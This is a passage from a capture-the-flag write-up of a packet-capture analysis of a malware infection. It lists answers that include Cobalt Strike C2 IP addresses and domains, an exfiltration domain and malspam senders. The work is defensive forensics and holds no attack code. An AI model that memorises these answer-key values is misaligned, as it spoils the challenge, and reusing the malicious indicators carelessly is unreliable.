And then the third domain.

So the final answer will be..

Ans: finejewels.com.au, thietbiagt.com, new.americold.com

Q8

Which certificate authority issued the SSL certificate to the first domain from the previous question?

Back to the TCP stream for the first domain.

So it’s godaddy certificate authority.

Ans: GoDaddy

Q9

What are the two IP addresses of the Cobalt Strike servers? Use VirusTotal (the Community tab) to confirm if IPs are identified as Cobalt Strike C2 servers. (answer format: enter the IP addresses in sequential order)

So we are looking for IP addresses used as a C2 (Command & Control) servers to give further instructions to the malware.

I kept looking for suspicious IPs, back to the http filter, and scrolling a little bit down.

I found this IP, the http request was enough to test it, put it in virustotal and move to the community tab and I was right!

The second IP was making a lot of connections, so I give it a try.

And yes.

Ans: 185.106.96.158, 185.125.204.174

Q10

What is the Host header for the first Cobalt Strike IP address from the previous question?

He wants the host header for 185.106.96.158.

Just look in the packet details section, in the http tab.

Ans: ocsp.verisign.com

Q11

What is the domain name for the first IP address of the Cobalt Strike server? You may use VirusTotal to confirm if it’s the Cobalt Strike server (check the Community tab).

Back to virustotal.

Just check the comments in the community tab.

Ans: survmeter.live

Q12

What is the domain name of the second Cobalt Strike server IP? You may use VirusTotal to confirm if it’s the Cobalt Strike server (check the Community tab).

Just check the comments in the community tab.

Ans: securitybusinpuff.com

Q13

What is the domain name of the post-infection traffic?

The post-infection traffic, is the https c2 traffic that occurs after the victim is infected.

You can look in the packet details section, in the http tab.

It’s all started from the zip file which contains an excel file.

Straight after it you can see a lot of http post request methods with this domain, so I can assume that the malware is exfiltrating data from the victims machine to this domain.

Ans: maldivehost.net

Q14

What are the first eleven characters that the victim host sends out to the malicious domain involved in the post-infection traffic?

Follow TCP stream of the packet in the previous screenshot.

And take the first eleven characters from these encoded characters.

Ans: zLIisQRWZI9

Q15

What was the length for the first packet sent out to the C2 server?

You can determine this by looking at the Length field of the first packet to the c2 server.

Ans: 281

Q16

What was the Server header for the malicious domain from the previous question?

Follow TCP stream for the same packet, and there it is.

Ans: Apache/2.4.49 (cPanel) OpenSSL/1.1.1l mod_bwlimited/1.4

Q17

The malware used an API to check for the IP address of the victim’s machine. What was the date and time when the DNS query for the IP check domain occurred? (answer format: yyyy-mm-dd hh:mm:ss UTC)

Filter for DNS traffic and the source IP address of the victim’s machine, to filters DNS queries only.

Scroll down, we are looking for something that have an API or IP.

Here we go, there is a query with the domain api.ipify.org.

Look for the time for this packet from the Time field.

Ans: 2021–09–24 17:00:04

Q18

What was the domain in the DNS query from the previous question?

It was obvious from the previous question.

Ans: api.ipify.org

Q19

Looks like there was some malicious spam (malspam) activity going on. What was the first MAIL FROM address observed in the traffic?

Filter for smtp traffic and look for the first Mail from address.

Ans: farshin@mailfa.com

Q20

How many packets were observed for the SMTP traffic?

Only filter for smtp traffic and look for the number of displayed packets down there.

Ans: 1439

Thank you for reading, I hope you enjoy it.

You can find me on LinkedIn from here: https://www.linkedin.com/in/0G13